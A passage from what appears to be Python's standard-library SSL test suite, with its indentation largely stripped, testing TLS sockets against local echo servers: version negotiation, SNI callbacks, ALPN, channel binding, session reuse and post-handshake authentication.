if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
        d2 = b''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
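            # sendto/recvfrom (and recvfrom_into) are not allowed on SSL
            # sockets; those entries expect a ValueError whose message
            # starts with the method name.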
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
        # Issue #16357: accept() on an SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
            # Block on accept() and wait for the connection to close.
evt.set()
remote, peer = server.accept()
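            # Echo the first four bytes back so the client's recv() below
            # can complete.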
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
        # Client waits until the server is set up, then connects.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
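                # version() is None before the handshake completes and again
                # after the socket has been closed.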
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
        # Prior to OpenSSL 1.0.0, ECDH ciphers had to be enabled
        # explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
                # and compare with the peer's version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
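            # The server-side list records the ALPN protocol selected per
            # connection; compare the most recent entry below.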
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
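                # Swap in the other context so its certificate
                # (SIGNED_CERTFILE2) is served for this connection.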
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
        # SIGNED_CERTFILE2 (CN 'fakehostname') was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
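            # Deliberately raise ZeroDivisionError inside the callback.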
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context2.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
                # the session can be set before the handshake and before
                # the connection is established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
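        # Dump TLS alert messages to stdout in verbose mode to help
        # diagnose the handshake failure expected below.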
def msg_cb(conn, direction, version, content_type, msg_type, data):
if support.verbose and content_type == _TLSContentType.ALERT:
info = (conn, direction, version, content_type, msg_type, data)
sys.stdout.write(f"TLS: {info!r}\n")
server_context._msg_callback = msg_cb
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
